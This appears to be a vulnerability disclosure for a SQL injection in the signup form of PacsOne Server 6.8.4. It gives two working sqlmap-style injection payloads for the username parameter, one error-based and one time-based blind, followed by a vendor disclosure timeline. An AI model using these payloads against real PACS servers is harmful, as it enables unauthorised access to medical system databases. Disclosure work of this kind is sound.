Vulnerability
PacsOne Server 6.8.4 suffers from a SQL injection vulnerability in the username parameter of the signup page.
Exploit
The injection gives an attacker access to the usersignup table in the PACS server's database. The two sqlmap-style vectors below were confirmed against the signup form (unauthenticated POST).
Parameter: username (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: hostname=localhost&database=PACS&username=asdf'||(SELECT 0x7a6d7355 WHERE 7540=7540 AND (SELECT 2789 FROM(SELECT COUNT(*),CONCAT(0x7178627171,(SELECT (ELT(2789=2789,1))),0x717a627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&password=asdf&firstname=asdf&lastname=asfd&email=asfd@foo.bar&action=Sign Up
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: hostname=localhost&database=PACS&username=asdf'||(SELECT 0x7961476e WHERE 9154=9154 AND (SELECT 7374 FROM (SELECT(SLEEP(5)))nQhL))||'&password=asdf&firstname=asdf&lastname=asfd&email=asfd@foo.bar&action=Sign Up
Timeline
05-07-20: Report submitted to the vendor by email; immediate response
05-21-20: Issue resolved
09-10-20: New version released
09-19-20: Public disclosure submitted
Reference
Disclaimer
Content is for educational and research purposes only. The author does not hold any responsibility for the misuse of the software, exploits or security findings contained herein and does not condone such misuse whatsoever.

